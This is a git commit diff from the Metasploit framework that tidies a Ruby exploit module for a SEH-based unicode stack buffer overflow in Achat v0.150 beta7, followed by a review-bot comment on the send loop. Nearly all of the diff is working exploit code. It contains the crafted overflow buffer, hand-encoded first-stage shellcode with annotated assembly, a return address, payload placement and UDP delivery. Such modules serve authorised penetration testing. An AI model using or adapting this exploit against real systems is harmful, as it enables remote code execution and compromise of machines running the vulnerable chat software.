Do minor cleanup

bug/bundler_fix
jvazquez-r7 2015-02-09 17:33:05 -06:00
parent ac6879cfe1
commit 86f3bcad11
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 24 additions and 28 deletions


@ -15,17 +15,16 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Achat v0.150 beta7 Buffer Overflow',
'Description' => %q{
This module exploits a SEH based unicode stack buffer overflow in Achat v0.150,
by sending a crafted message to the default harcoded port 9256. The message
overflows the stack and overwrites the SEH handler. The exploit is reliable, but
depends of timing. It has two distinct threads that are overflowing the stack in
the same time. Tested on Windows XP SP3 and Windows 7.
The overflow was found by Peter Kasza.
This module exploits an unicode SEH based stack buffer overflow in Achat v0.150. By
sending a crafted message to the default port 9256 it's possible to overwrites the
SEH handler. Even when the exploit is reliable it depends of timing since there are
two threads overflowing the stack in the same time. This module has been tested on
Windows XP SP3 and Windows 7.
},
'Author' =>
[
'Balazs Bucsay <balazs.bucsay[-at-]rycon[-dot-]hu>', # Exploit, Metasploit module
'Peter Kasza <peter.kasza[-at-]itinsight[-dot-]hu>' # Vulnerability discovery
'Peter Kasza <peter.kasza[at]itinsight.hu>', # Vulnerability discovery
'Balazs Bucsay <balazs.bucsay[at]rycon.hu>' # Exploit, Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
@ -45,16 +44,15 @@ class Metasploit3 < Msf::Exploit::Remote
'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'EAX',
'BufferRegister' => 'EAX'
}
},
'Platform' => 'win',
'Targets' =>
[
# Tested OK Windows XP SP3, Windows 7
# Not working on Windows Server 2003
[ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ], #AChat.exe
# Tested OK Windows XP SP3, Windows 7
# Not working on Windows Server 2003
[ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe
],
'Privileged' => false,
'DefaultTarget' => 0,
@ -62,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(9256),
Opt::RPORT(9256)
], self.class)
end
@ -85,20 +83,20 @@ class Metasploit3 < Msf::Exploit::Remote
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
# 59 POP ECX # padding
# 0039 ADD BYTE PTR DS:[ECX],BH # padding
firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
sploit = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
sploit << "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
sploit << "\x62" + "A"*45 # 0x62 will be used to calculate the right offset
sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00"
sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46)
sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset
sploit << "\x61\x40" # POPAD + INC EAX
sploit << target.ret # AChat.exe p/p/r address
# adjusting the first thread's unicode payload, tricky asm-fu
# the first seh exception jumps here, firststage variable will be executed
# the first seh exception jumps here, first_stage variable will be executed
# by the second seh exception as well. It needs to be in sync with the second
# thread, so that is why we adjust eax/ebp to have a close pointer to the
# payload, then firststage variable will take the rest of the job.
# payload, then first_stage variable will take the rest of the job.
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
# 55 PUSH EBP # ebp with close pointer to payload
# 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
@ -113,22 +111,20 @@ class Metasploit3 < Msf::Exploit::Remote
# 50 PUSH EAX # saving eax
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
# 5D POP EBP # mov ebp, eax
sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43"
sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX
sploit << payload.encoded + "A"*(1152-payload.encoded.length) # placing the payload
sploit << "\x00" + "A"*10 + "\x00"
sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX
sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload
sploit << "\x00" + 'A' * 10 + "\x00"
i = 0
while i < sploit.length do
if i > 172000
Rex::sleep(1.0)
end
udp_sock.put(sploit[i..i+8192-1])
i += 8192
sent = udp_sock.put(sploit[i..i + 8192 - 1])
i += sent
end
disconnect_udp
end
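Review bot: The send loop in the last hunk now advances by `sent`, so a `put` that returns 0 (or `nil` if Rex's UDP `put` does not hand back a byte count, which the hunk does not show) leaves `i` unchanged and spins forever, whereas the old `i += 8192` always terminated. A guard between the two new lines, `fail_with(Failure::Unknown, 'UDP send returned no bytes') if sent.nil? || sent <= 0`, makes the failure explicit instead of a hang. The `31 -3` in `'C' * (157 - first_stage.length - 31 -3)` is the one spot in the rewritten lines that still lacks the spacing the rest of the cleanup applies. The enclosing `exploit` method starts above the hunk.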